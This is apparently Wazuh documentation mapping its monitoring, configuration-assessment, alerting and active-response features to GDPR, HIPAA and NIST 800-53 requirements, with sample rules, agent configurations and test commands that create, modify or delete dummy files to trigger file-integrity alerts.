Chapter II, Article 5 Head 1(f)

Principles relating to processing of personal data, Head 1 (f): “Personal data shall be processed in a manner that ensures appropriate security of the personal data, including protection against unauthorized or unlawful processing and against accidental loss, destruction or damage, using appropriate technical or organizational measures (integrity and confidentiality).”

The article requires confidentiality and integrity when processing user data. The File Integrity Monitoring (FIM) module of Wazuh helps with this requirement by monitoring files and folders. The Wazuh FIM module generates alerts when it detects file creation, modification, or deletion events. The FIM module keeps a record of the cryptographic checksum and other attributes from a file or a registry key in the case of a Windows endpoint, and regularly compares them to the current attributes of the file.

Below are some examples of Wazuh rules tagged as gdpr_II_5.1.f:

<rule id="550" level="7">
    <category>ossec</category>
    <decoded_as>syscheck_integrity_changed</decoded_as>
    <description>Integrity checksum changed.</description>
    <group>syscheck,pci_dss_11.5,gpg13_4.11,gdpr_II_5.1.f,</group>
</rule>

<rule id="554" level="5">
    <category>ossec</category>
    <decoded_as>syscheck_new_entry</decoded_as>
    <description>File added to the system.</description>
    <group>syscheck,pci_dss_11.5,gpg13_4.11,gdpr_II_5.1.f,</group>
</rule>
Use case: Detect file changes

In this use case, you have to configure the Wazuh agent on an Ubuntu 22.04 endpoint to detect changes in the /root/personal_data directory. Then, you need to modify a file to trigger an alert.

Ubuntu endpoint
  1. Switch to the root user:

    $ sudo su
    
  2. Create the directory personal_data in the /root directory:

    # mkdir /root/personal_data
    
  3. Create the file subject_data.txt in the /root/personal_data directory and include some content:

    # touch /root/personal_data/subject_data.txt
    # echo "User01= user03_ID" >> /root/personal_data/subject_data.txt
    
  4. Add the configuration highlighted to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories realtime="yes" check_all="yes" report_changes="yes">/root/personal_data</directories>
    </syscheck>
    
  5. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  6. Modify the file by changing the content of subject_data.txt from User01= user03_ID to User01= user02_ID:

    # echo "User01= user02_ID" > /root/personal_data/subject_data.txt
    # cat /root/personal_data/subject_data.txt
    
    User01= user02_ID
    

On the Wazuh dashboard, an alert detects the modification of the subject_data.txt file. The alert is also tagged with gdpr_II_5.1.f.

GDPR III, Rights of the data subject <gdpr_III>

In this chapter, GDPR describes the rights of individuals regarding personal data management by third-party entities.

Chapter III, Article 14, Head 2 (c)

Information to be provided where personal data have not been obtained from the data subject, Head 2 (c): “In addition to the information referred to in paragraph 1, the controller shall provide the data subject with the following information necessary to ensure fair and transparent processing in respect of the data subject: the existence of the right to request from the controller access to and rectification or erasure of personal data or restriction of processing concerning the data subject and to object to processing as well as the right to data portability.”

This article requires that when an individual requests a temporary restriction on processing his user data, there is no access to that data during the period specified.

Using File Integrity Monitoring (FIM) and the Wazuh dashboard, you can perform searches to confirm that there has been no modification or deletion of user data during the specified period of restriction.

Use case: Search for FIM events within a certain time frame

In this use case, from the Wazuh dashboard, filter for syscheck events to confirm that there have been no FIM events involving modification or deletion of restricted data during specific time intervals.

Chapter III, Article 17, Head 1

Right to erasure (right to be forgotten): “The data subject shall have the right to obtain from the controller the erasure of personal data concerning him or her without undue delay and the controller shall have the obligation to erase personal data without undue delay.”

The Wazuh File Integrity Monitoring module assists in meeting this GDPR requirement. It monitors specified files and folders containing personal data and generates alerts when modification or deletion occurs. File deletion alerts can provide individuals with confirmation that their personal data has been permanently deleted in response to their request.

Use case: Detect file deletion

In this use case, you have to configure the Wazuh agent on an Ubuntu 22.04 endpoint to detect file deletion in the /root/personal_data directory. Then, you need to delete a file to trigger an alert.

Ubuntu endpoint
  1. Switch to the root user:

    $ sudo su
    
  2. Create the directory personal_data in the /root directory:

    # mkdir /root/personal_data
    
  3. Create the file subject_data.txt in the /root/personal_data directory and include some content:

    # touch /root/personal_data/subject_data.txt
    # echo "User01= user03_ID" >> /root/personal_data/subject_data.txt
    
  4. Add the configuration highlighted to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories check_all="yes" realtime="yes">/root/personal_data</directories>
    </syscheck>
    
  5. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  6. Delete the file subject_data.txt:

    # rm /root/personal_data/subject_data.txt
    

On the Wazuh dashboard, an alert shows that the subject_data.txt file has been deleted.

GDPR IV, Controller and processor <gdpr_IV>

In this chapter, GDPR describes requirements related to managing, controlling, and processing personal data.

Chapter IV, Article 24, Head 2

Responsibility of the controller, Head 2: “Where proportionate in relation to processing activities, the measures referred to in paragraph 1 shall include the implementation of appropriate data protection policies by the controller.”

This article requires that adequate technical and organizational measures assist in complying with data security and protection policies. Therefore, the entity in charge of processing and storing data must comply with these policies.

Using the Security Configuration Assessment (SCA) module, Wazuh performs configuration assessments to ensure that endpoints comply with security policies, standards, and hardening guides. Refer to the SCA documentation section for more details on configuring SCA checks.

Use case: Ensure that the shadow group is empty

In this use case, Wazuh runs SCA checks to find out if the shadow user group on an Ubuntu 22.04 endpoint is empty. The /etc/shadow file in Linux systems stores encrypted user passwords. Any user in the shadow group can read the contents of the /etc/shadow file. Unauthorized access to this file can lead to system compromise by malicious actors. The SCA check ID is 28690. When the SCA check runs, if there are no users assigned to the shadow group, the SCA check passes.

The image below shows the result of the SCA check on the Wazuh dashboard.

Chapter IV, Article 28, Head 3 (c)

Processor, Head 3 (c): “Processing by a processor shall be governed by a contract or other legal act under Union or Member State law, that is binding on the processor with regard to the controller and that sets out the subject-matter and duration of the processing, the nature and purpose of the processing, the type of personal data and categories of data subjects and the obligations and rights of the controller. That contract or other legal act shall stipulate, in particular, that the processor: takes all measures required pursuant to Article 32.”

According to this article, organizational and technical safeguards must be in place to protect data during processing. This is necessary to avoid any unauthorized alterations.

Using the File Integrity Monitoring (FIM) module, Wazuh ensures that certain established protection measures are met. Wazuh uses the FIM module to help enhance security in the processing of data. It logs information about who modified the data, when the modification occurred, and all related events impacting the data of interest.

Use case: Detect changes to file attributes

In this use case, you have to configure the Wazuh agent to detect changes to /root/personal_data or its attributes, as well as detect who made the changes. The configuration in this use case is specific to an Ubuntu 22.04 endpoint. Then, you need to change the owner of a file to trigger an alert.

Ubuntu endpoint
  1. Switch to the root user:

    $ sudo su
    
  2. Create the directory personal_data in the /root directory:

    # mkdir /root/personal_data
    
  3. Create the file subject_data.txt in the /root/personal_data directory and include some content:

    # touch /root/personal_data/subject_data.txt
    # echo "User01= user03_ID" >> /root/personal_data/subject_data.txt
    
  4. Install auditd to get information about who made changes in a monitored directory using the Linux Auditing System:

    # apt-get install auditd
    
  5. Add the configuration highlighted to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories check_all="yes" whodata="yes" >/root/personal_data</directories>
    </syscheck>
    
  6. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  7. Change the owner of subject_data.txt from root to a regular user:

    # chown <YOUR_REGULAR_USER>:<YOUR_REGULAR_USER> /root/personal_data/subject_data.txt
    

The FIM module generates the alert below showing the changed attributes.

Chapter IV, Article 30, Head 1 (g)

Records of processing activities. Head 1 (g): “Each controller and, where applicable, the controller's representative, shall maintain a record of processing activities under its responsibility. That record shall contain all of the following information: where possible, a general description of the technical and organizational security measures referred to in Article 32 (1).”

This article requires that organizations document, inventory, and audit data processing activities. This helps keep a record of all data processing activities.

Wazuh supports the storage of information about file integrity monitoring and system events. It uses the log data collection capability to store all the events the Wazuh server receives in the archives file /var/ossec/logs/archives/archives.log. Additionally, the /var/ossec/logs/archives/alerts.log file stores alerts from rules triggered. These logs help in performing various activities, such as data audits and threat hunting.

Use case: Store all logs generated from an endpoint

In this use case, you have to set storage of all events from monitored endpoints in the Wazuh archives, whether they generate an alert or not.

Wazuh server
  1. Edit the Wazuh server configuration file /var/ossec/etc/ossec.conf and set the <logall> option to yes. We have highlighted the <logall> option in the configuration block below:

    <global>
      <jsonout_output>yes</jsonout_output>
      <alerts_log>yes</alerts_log>
      <logall>yes</logall>
      <logall_json>no</logall_json>
      <email_notification>no</email_notification>
      <smtp_server>smtp.example.wazuh.com</smtp_server>
      <email_from>wazuh@example.wazuh.com</email_from>
      <email_to>recipient@example.wazuh.com</email_to>
      <email_maxperhour>12</email_maxperhour>
      <email_log_source>alerts.log</email_log_source>
      <agents_disconnection_time>15m</agents_disconnection_time>
     <agents_disconnection_alert_time>0</agents_disconnection_alert_time>
    </global>
    
  2. Restart the Wazuh manager to apply the configuration:

    # systemctl restart wazuh-manager
    
  3. Check the contents of the /var/ossec/logs/archives/archives.log file on the Wazuh manager, you can see events including those that do not trigger an alert:

    # tail -f /var/ossec/logs/archives/archives.log
    
    2022 Sep 30 09:57:25 wazuh-manager->/var/log/syslog Sep 30 09:57:25 wazuh-manager multipathd[504]: sda: failed to get sgio uid: No data available
    2022 Sep 30 09:57:25 wazuh-manager->/var/log/syslog Sep 30 09:57:25 wazuh-manager multipathd[504]: sda: failed to get sysfs uid: No data available
    2022 Sep 30 09:57:30 (Ubuntu) any->/var/log/auth.log Sep 30 09:57:30 Ubuntu su: pam_unix(su:session): session closed for user root
    2022 Sep 30 09:57:30 (Ubuntu) any->/var/log/auth.log Sep 30 09:57:30 Ubuntu sudo: pam_unix(sudo:session): session closed for user root
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:30 wazuh-manager multipathd[504]: sda: add missing path
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:30 wazuh-manager multipathd[504]: sda: failed to get sysfs uid: No data available
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:30 wazuh-manager multipathd[504]: sda: failed to get udev uid: Invalid argument
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:30 wazuh-manager multipathd[504]: sda: failed to get sgio uid: No data available
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:31 wazuh-manager multipathd[504]: sdb: add missing path
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:31 wazuh-manager multipathd[504]: sdb: failed to get udev uid: Invalid argument
    
Chapter IV, Article 32, Head 2

Security of processing, Head 2: “In assessing the appropriate level of security, account shall be taken in particular of the risks that are presented by processing, in particular from accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to personal data transmitted, stored or otherwise processed.”

This article requires carrying out risk assessments to find out what risks processing actions pose to personal user data. The Wazuh log data analysis module and default ruleset help meet aspects of this article by monitoring actions taken by data administrators. With this, the data protection officer is able to check who is accessing and processing the data, whether they are authorized to do so, and whether they are who they say they are.

Use case: Invalid SSH login attempts

In this use case, there is an example of a Wazuh rule to detect SSH authentication attempts with an invalid user. The Wazuh server receives SSH authentication logs from the monitored endpoint. Then, the log data analysis module subsequently decodes and evaluates these logs against default Wazuh rules to determine if they match the behavior of interest.

  • Rule 5710 - sshd: Attempt to login using a non-existent user.

    <rule id="5710" level="5">
      <if_sid>5700</if_sid>
      <match>illegal user|invalid user</match>
      <description>sshd: Attempt to login using a non-existent user</description>
      <group>invalid_login,authentication_failed,pci_dss_10.2.4,pci_dss_10.2.5,pci_dss_10.6.1,gpg13_7.1,gdpr_IV_35.7.d,gdpr_IV_32.2,</group>
    </rule>
    

When an invalid login attempt triggers rule 5710, you can see the alert below on the Wazuh dashboard.

Chapter IV, Article 33, Head 1

Notification of a personal data breach to the supervisory authority, Head 1: “In the case of a personal data breach, the controller shall without undue delay and, where feasible, not later than 72 hours after having become aware of it, notify the personal data breach to the supervisory authority competent in accordance with Article 55, unless the personal data breach is unlikely to result in a risk to the rights and freedoms of natural persons. Where the notification to the supervisory authority is not made within 72 hours, it shall be accompanied by reasons for the delay.”

This article requires that organizations report data breaches to the appropriate authorities within a stipulated time frame. Wazuh facilitates this communication by sending email notifications when events trigger a specific alert or a group of alerts related to events about personal data. Refer to the Wazuh email alerts section of the documentation for more information on configuring email notifications.

Use case: Email alert on failed login

In this use case, you configure Wazuh to generate an alert and send notifications to the specified email addresses whenever a user login attempt via SSH fails.

  1. Edit the email section of the Wazuh manager configuration file /var/ossec/etc/ossec.conf as follows to implement email notifications:

    <ossec_config>
      <global>
        <email_notification>yes</email_notification>
        <email_to>data_protection_officer@test.example</email_to>
        <smtp_server>mail.test.example</smtp_server>
        <email_from>wazuh@test.example</email_from>
      </global>
    </ossec_config>
    
  2. Restart the Wazuh manager to apply the configuration changes:

    # systemctl restart wazuh-manager
    

The changes made enable sending alerts via email to data_protection_officer@test.example.

The sample email sent after an alert is generated looks like the following:

From: Wazuh <wazuh@test.example>               5:03 PM (2 minutes ago)
to: me
-----------------------------
Wazuh Notification.
2022 Jun 20 17:03:05

Received From: Ubuntu->/var/log/secure
Rule: 5503 fired (level 5) -> "PAM: User login failed."
Src IP: 192.168.1.37
Portion of the log(s):

Jun  20 22:03:04 Ubuntu sshd[67231]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.37
uid: 0
euid: 0
tty: ssh

 --END OF NOTIFICATION
Chapter IV, Article 35, Head 1

Data protection impact assessment, Head 1: “Where a type of processing in particular using new technologies, and taking into account the nature, scope, context and purposes of the processing, is likely to result in a high risk to the rights and freedoms of natural persons, the controller shall, prior to the processing, carry out an assessment of the impact of the envisaged processing operations on the protection of personal data. A single assessment may address a set of similar processing operations that present similar high risks.”

This article recommends performing a risk assessment on data processing channels and the impact of the risks identified on data protection. Wazuh can support the risk assessment outcome by categorizing FIM alerts for certain files or directories and increasing the alert levels based on the risk assessment reports.

Use case: Increase the alert level of a file modification event

In this use case, you have to set a high alert level for a file modification event if the file is in a specific directory. In the example below, you can find a rule with an alert level 15 for data changes in the /customers/personal_data directory. Then, you need to modify files to trigger alerts.

Ubuntu endpoint
  1. Create the directory /customers:

    # mkdir /customers
    
  2. Create the directory personal_data in the /customers directory:

    # mkdir /customers/personal_data
    
  3. Add the configuration highlighted to the syscheck block of the agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories realtime="yes" check_all="yes" report_changes="yes">/customers/</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
Wazuh server
  1. Add the following rules in the /var/ossec/etc/rules/local_rules.xml file:

    <rule id="100002" level="15">
        <if_matched_group>syscheck</if_matched_group>
        <match>/customers/personal_data</match>
        <description>Changes made to a sensitive file - $(file).</description>
    </rule>
    
  2. Restart the Wazuh manager for the configuration changes to apply:

    # systemctl restart wazuh-manager
    
Ubuntu endpoint
  1. Create the file regular_data.txt in the /customers directory and add some content:

    # touch /customers/regular_data.txt
    # echo "this is regular data" >> /customers/regular_data.txt
    

    You can see a level 7 alert generated in the File Integrity Monitoring section of the Wazuh dashboard to show that a file in the monitored directory was modified.

  2. Create the file sensitive_data.txt in the /customers/personal_data directory and add some content:

    # touch /customers/personal_data/sensitive_data.txt
    # echo "User01= user03_ID" >> /customers/personal_data/sensitive_data.txt
    

    You can see a level 15 alert generated to show that a sensitive file in the monitored directory was modified.

Chapter IV, Article 35, Head 7 (d)

Data protection impact assessment, Head 7 (d): "The assessment shall contain at least the measures envisaged to address the risks, including safeguards, security measures and mechanisms to ensure the protection of personal data and to demonstrate compliance with this Regulation taking into account the rights and legitimate interests of data subjects and other persons concerned."

This article recommends that you implement necessary security measures to protect subject data. These security measures include threat detection and response on endpoints that contain personal user data.

Wazuh helps meet this article of the GDPR by providing security measures such as:

Using Wazuh for HIPAA compliance

The Health Insurance Portability and Accountability Act (HIPAA) has specifications and procedures for handling health information. This act aims to improve the effectiveness of healthcare services. It includes standards for electronic health care transactions and code sets. It also includes standards for security and unique health identifiers. Because changes in technology can impact the privacy and security of healthcare data, HIPAA provisions have sections that require the use of federal privacy protections for individually identifiable health information.

Part 164, subpart C (Security Standards For The Protection Of Electronic Protected Health Information), provides guidelines for the transmission, handling, storage, and protection of electronic healthcare information.

Wazuh has various capabilities that assist with HIPAA compliance such as log data analysis, file integrity monitoring, configuration assessment, threat detection and response.

Wazuh includes default rules and decoders for detecting security incidents, system errors, security misconfigurations, and policy violations. By default, these rules are mapped to the associated HIPAA standard. In addition to the default rule mapping provided by Wazuh, it’s possible to map your custom rules to one or more HIPAA standards by adding the compliance identifier in the <group> tag of the rule. The syntax used to map a rule to a HIPAA standard is hipaa_ followed by the number of the requirement, for example, hipaa_164.312.b. Refer to the ruleset section for more information.

The Wazuh for HIPAA guide (PDF) focuses on part 164, subpart C (Security Standards For The Protection Of Electronic Protected Health Information) of the HIPAA standard. This guide explains how the various Wazuh modules assist in complying with HIPAA standards.

We have use cases in the following sections that show how to use Wazuh capabilities and modules to comply with HIPAA standards:

Visualization and dashboard

Wazuh offers a web dashboard for data visualization and analysis. The Wazuh dashboard comes with out-of-the-box modules for threat hunting, compliance, detected vulnerable applications, file integrity monitoring data, configuration assessment results, and cloud infrastructure monitoring. It’s useful for performing forensic and historical alert analysis.

The Wazuh dashboard assists in meeting the following HIPAA section:

  • Security Management Process §164.308(a)(1) - Information System Activity Review: “Implement procedures to regularly review records of information system activity, such as audit logs, access reports, and security incident tracking reports.”

This section of the HIPAA standard requires reviewing the activities performed on endpoints that handle health data regularly. This is to detect malicious behavior or security violations.

Use case: Review HIPAA security alerts

Wazuh generates alerts when there are violations of the HIPAA sections. The Wazuh dashboard is used to review events and alerts generated by suspicious activities.

The Wazuh dashboard comes with a dedicated module to track HIPAA related events.

When you choose the HIPAA module, you can see all alerts related to the HIPAA standard:

Additionally, the Controls section of the HIPAA compliance dashboard shows the various HIPAA related events. For ease of navigation, the Wazuh dashboard groups events according to the HIPAA section they meet or violate.

On the Wazuh dashboard, each HIPAA section has an information area. This area details the goals of the section, its description, and related events on the monitored endpoints.

Log data analysis

The logs generated from devices, systems, and applications are useful for detecting security incidents and system errors. The Wazuh log data analysis module collects and analyzes logs from various sources such as applications, endpoints, network devices, cloud workloads, and other security solutions. The data collected and analyzed by the log data analysis module helps in threat detection, prevention, and active response. Refer to the ruleset section for more information.

The Wazuh log data analysis module can help comply with the following HIPAA sections:

  • Audit Controls §164.312(b): “A covered entity or business associate must, in accordance with § 164.306 implement hardware, software, and/or procedural mechanisms that record and examine activity in information systems that contain or use electronic protected health information.”

    This section of the HIPAA standard requires that tools be in place to log activities on all systems containing health data. The activities logged may include: authentication, system or application failure, and file read, write, or modification events.

  • Security Incident Procedures §164.308(a)(6)(i) - Response and reporting: “Identify and respond to suspected or known security incidents; mitigate, to the extent practicable, harmful effects of security incidents that are known to the covered entity or business associate; and document security incidents and their outcomes.”

    This section of the HIPAA standard requires you to identify and mitigate security incidents and threats. The log data analysis module helps identify these incidents by analysis of endpoint activities.

  • Person or Entity Authentication §164.312(d): “A covered entity or business associate must, in accordance with § 164.306 implement procedures to verify that a person or entity seeking access to electronic protected health information is the one claimed.”

    This section of the HIPAA standard requires you to log and review user authentication activities. The analysis of these activities helps determine if they are legitimate. The Wazuh log data analysis module analyzes logs to generate alerts when suspicious activities are detected.

Use case: SSH authentication

In this use case, the Wazuh server receives SSH authentication logs from an Ubuntu 22.04 endpoint. The log data analysis module subsequently decodes and evaluates these logs against Wazuh rules to find if they match the behavior of interest. For example, successful authentication.

Below is a rule to detect and alert on a successful SSH authentication:

  • Rule 5715 - sshd: authentication success: When a user successfully logs into an endpoint via SSH, this rule generates an alert. The alert includes the username, timestamp, and authentication status (success, or failure). The image below shows the alerts generated on the Wazuh dashboard for successful SSH authentications:

Configuration assessment

The Security Configuration Assessment (SCA) module performs scans to determine if monitored endpoints meet secure configuration and hardening policies. These scans assess the configuration of the endpoint using policy files that contain rules to be tested against the actual configuration of the endpoint.

The SCA module can help to implement the following HIPAA sections:

  • Evaluation §164.308(a)(8): “A covered entity or business associate must perform a periodic technical and nontechnical evaluation, based initially on the standards implemented under this rule and, subsequently, in response to environmental or operational changes affecting the security of electronic protected health information, that establishes the extent to which a covered entity's or business associate's security policies and procedures meet the requirements of this subpart.”

    This section of the HIPAA standard requires you to conduct regular reviews of systems containing health information to ensure that they comply with security policies.

  • Access Control §164.312(a)(1) - Automatic Logoff: “Implement electronic procedures that terminate an electronic session after a predetermined time of inactivity.”

    This section of the HIPAA standard requires you to implement measures that will terminate login sessions in systems that contain healthcare information after a specified period of inactivity. This includes making sure that an RDP or SSH session is automatically terminated after a predetermined duration of inactivity.

    The Wazuh SCA module scans endpoints on a regular basis to ensure they comply with specified security policies. These scans also find missing access control policies like automatic logoff configurations. Refer to the Wazuh SCA documentation for more details on configuring SCA checks.

Use cases: SCA scan and SSH session timeout
  • In this use case, the SCA module performs periodic scans on an Ubuntu 22.04 endpoint to ensure that it complies with security policies and hardening configurations. Additionally, the Configuration Assessment module on the Wazuh dashboard displays the status of the SCA checks (passed, failed, or not applicable) and the time of the last scan for a specific endpoint, as shown below:

    The Wazuh SCA policy CIS benchmark for Ubuntu Linux 22.04 LTS is an out-of-the-box policy based on the Center for Internet Security (CIS) benchmarks, a well-established standard for host hardening.

  • In this use case, Wazuh runs SCA checks to determine the status of SSH session timeouts on an Ubuntu 22.04 endpoint. The ID of the check is 28653. When this SCA check is run, if SSH session timeout on the endpoint is not configured, its result is Failed. Additionally, each SCA check contains the reason why the check is being performed, a description of the check and a remediation if the SCA check fails.

Malware detection

Wazuh offers several capabilities that support malware detection. The following methods achieve these detections:

These components of Wazuh help to comply with the following HIPAA sections:

  • Security Awareness and Training §164.308(a)(5)(i) - Protection from Malicious Software: “Procedures for guarding against, detecting, and reporting malicious software.”

    This section of the HIPAA standard requires you to have procedures to detect and remove malicious software. The Wazuh malware detection capability implements this HIPAA section with the aid of out-of-the-box rules, VirusTotal and YARA integration, and the use of CDB lists. The rootcheck component of Wazuh also detects abnormal behavior in monitored endpoints. These capabilities help support this HIPAA section.

    We show a use case of how to detect a rootkit.

File integrity monitoring

The Wazuh File Integrity Monitoring (FIM) module monitors an endpoint filesystem to detect changes in specified files and directories. It triggers alerts on file creation, modification, or deletion from the monitored paths. The FIM module stores the cryptographic checksum and other attributes of the monitored file, folder, or Windows registry key, and alerts when there is a change.

The File Integrity Monitoring module assists you in meeting the following HIPAA sections:

  • Workforce Security §164.308(a)(3)(i) - Authorization and/or supervision: “Implement procedures for the authorization and/or supervision of workforce members who work with electronic protected health information or in locations where it might be accessed.”

  • Integrity §164.312(c)(1) - Mechanism to authenticate electronic protected health information: “Implement electronic mechanisms to corroborate that electronic protected health information has not been altered or destroyed in an unauthorized manner. ”

  • Transmission Security §164.312(e)(1) - Integrity controls: “Implement security measures to ensure that electronically transmitted electronic protected health information is not improperly modified without detection until disposed of.”

These sections of the HIPAA standard require monitoring files and directories containing healthcare data. The Wazuh FIM module assists in meeting this HIPAA section. It monitors files containing healthcare information and generates alerts when there is a modification or deletion. Refer to the Wazuh FIM documentation for more details on configuring file integrity monitoring.

Use cases: Detect file changes and deletion

The use cases in this section are performed on an Ubuntu 22.04 endpoint.

Detect file changes

In this use case, the Wazuh agent detects changes made to the patient_data.txt file in the /root/health_data directory.

On the Ubuntu endpoint

  1. Create the health_data directory in the /root directory:

    # mkdir /root/health_data
    
  2. Create the file patient_data.txt in the /root/health_data directory and include some content:

    # touch /root/health_data/patient_data.txt
    # echo "User1 = medication" >> /root/health_data/patient_data.txt
    
  3. Add the following configuration to the syscheck block of the agent configuration file /var/ossec/etc/ossec.conf to monitor the /root/health_data directory for changes:

    <syscheck>
       <directories check_all="yes" realtime="yes">/root/health_data</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  5. Modify the file by adding new content:

    # echo "User2 = medication3" >> /root/health_data/patient_data.txt
    

    You can see an alert generated to show that a file in the monitored directory was modified.

    The alert details include the differences in the file checksum, the file modified, the modification time, and other information.

Detect file deletion

In this use case, you configure the Wazuh agent to detect file deletion in a monitored directory. Using the steps below, configure the FIM module to monitor the /root/health_data/ directory for changes.

On the Ubuntu endpoint

  1. Create the health_data directory in the /root directory if it is not present:

    # mkdir /root/health_data
    
  2. Create the file patient_data.txt in the /root/health_data directory and include some content:

    # touch /root/health_data/patient_data.txt
    # echo "User1 = medication" > /root/health_data/patient_data.txt
    
  3. Add the following configuration to the syscheck block of the agent configuration file /var/ossec/etc/ossec.conf to monitor the /root/health_data directory for changes:

    <syscheck>
       <directories check_all="yes" realtime="yes">/root/health_data</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  5. Delete a file from the monitored directory. In this case, delete patient_data.txt. You can see an alert generated for the file deleted.

    The alert details include the file deleted, the endpoint where the file was deleted, the deletion time, and other details.

Vulnerability detection

Wazuh detects vulnerabilities in the applications installed on monitored endpoints using the Vulnerability Detection module. It performs a software audit by querying our Cyber Threat Intelligence (CTI) API for vulnerability content documents. We aggregate vulnerability information into the CTI repository from external vulnerability sources indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, CISA, and the National Vulnerability Database (NVD). We also maintain the integrity of our vulnerability data and the vulnerabilities repository updated, ensuring the solution checks for the latest CVEs. The Vulnerability detection module correlates this information with data from the endpoint application inventory.

The Vulnerability Detection module helps to implement the following HIPAA section:

  • Security Management Process §164.308(a)(1) - Risk Analysis: “Conduct an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity, and availability of electronic protected health information held by the covered entity or business associate.”

    This section of the HIPAA standard requires identifying risks and vulnerabilities affecting systems containing healthcare information.

    The Wazuh Vulnerability Detection module assists in meeting aspects of this HIPAA section. The Vulnerability Detection module checks for vulnerable applications/packages and missing OS updates in an endpoint. Refer to the vulnerability detection section of our documentation for more details on configuring vulnerability detection.

Use case: Detect vulnerabilities

In this use case, you configure Wazuh to detect vulnerabilities on a Debian endpoint with the following steps:

  1. Edit the Wazuh server configuration file /var/ossec/etc/ossec.conf. Make sure the module is enabled.

    <vulnerability-detection>
      <enabled>yes</enabled>
      <index-status>yes</index-status>
      <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    
  2. If you made changes, restart the Wazuh manager to apply them.

    # systemctl restart wazuh-manager
    

You can view the results on the Wazuh dashboard, which includes information about vulnerable packages on the monitored endpoint. In this case, the vim software installed on the endpoint has vulnerabilities.

When you select any of the vulnerabilities, the dashboard shows an overview of the issues detected.

Active Response

The Wazuh Active Response module is configured to automatically execute scripts when events match specified rules in the Wazuh ruleset. These scripts may perform a firewall block or drop, traffic shaping or throttling, account lockout, or any other user defined action.

The Active Response module assists in meeting the following HIPAA section:

  • Security Incident Procedures §164.308(a)(6)(i) - Response and Reporting: “Identify and respond to suspected or known security incidents; mitigate, to the extent practicable, harmful effects of security incidents that are known to the covered entity or business associate; and document security incidents and their outcomes.”

    The goal of this section is to make sure that you detect and respond to security incidents in your environment. The Active Response module assists in meeting this HIPAA section by responding to intrusions and unauthorized file changes. For more information on configuring Active Response, see the Active Response section of our documentation.

Use case: Block an IP address

In this use case, you configure the Active Response module to block an IP address when someone attempts to log in to an Ubuntu 22.04 endpoint with a non-existent user via SSH. To implement this, follow the steps below:

  1. Add the following block to the Wazuh server configuration file (/var/ossec/etc/ossec.conf).

    <active-response>
      <disabled>no</disabled>
      <command>firewall-drop</command>
      <location>local</location>
      <rules_id>5710</rules_id>
      <timeout>100</timeout>
    </active-response>
    

    This configures the Active Response to execute the firewall-drop command when there is an attempt to log in to a non-existent user (rule 5710).

    Note

    The Wazuh server configuration file includes the firewall-drop command by default.

  2. Restart the Wazuh server to apply the configuration:

    # systemctl restart wazuh-manager
    

    When you attempt to SSH with a non-existent user, rule 5710 generates an alert followed by an Active Response event.

Using Wazuh for NIST 800-53 compliance

NIST 800-53 is a cybersecurity framework developed by the National Institute of Standards and Technology (NIST). NIST 800-53 specifies security and privacy mechanisms and controls that U.S. federal information systems must implement and meet. The U.S. government makes compliance with these requirements mandatory for organizations and entities that process and handle federal data.

While NIST guidelines and recommendations are primarily targeted at federal agencies in the United States, they are widely used and respected by organizations in other sectors and countries as well. In fact, many industries and organizations have adopted the NIST Cybersecurity Framework as a basis for their own cybersecurity practices.

Wazuh has various capabilities and modules, such as log data analysis, file integrity monitoring, configuration assessment, threat detection, and autonomous response, that help improve organizations' cybersecurity posture. These Wazuh modules and capabilities also assist organizations in complying with NIST 800-53 controls.

Wazuh includes default rules and decoders for detecting security incidents, system errors, security misconfigurations, and policy violations. These rules are mapped to the NIST 800-53 controls by default. In addition to the default rule mapping provided by Wazuh, it’s possible to map your custom rules to one or more NIST 800-53 controls. For this, you need to add their compliance identifier in the <group> tag of the rule. The syntax used to map a rule to a NIST 800-53 control is nist_800_53_ followed by the acronym of the control and the specific control number. For example, the syntax nist_800_53_AU.12 maps a rule to the AU-12 Audit Record Generation control. Refer to the Rules syntax section for more information.

In the Wazuh for NIST 800-53 revision 5 guide (PDF), we explain how the various Wazuh modules assist in meeting and implementing NIST 800-53 controls.

We have some use cases in the following sections that show how to use Wazuh capabilities and modules to comply with NIST 800-53 controls:

Visualization and dashboard

Wazuh offers a web dashboard for continuous data visualization and analysis. The Wazuh dashboard comes with out-of-the-box modules for: threat hunting, regulatory compliance, detected vulnerable applications, file integrity monitoring, configuration assessment results, and cloud infrastructure monitoring. It helps perform forensic and historical alert analyses.

The Wazuh dashboard assists in meeting the following NIST 800-53 controls:

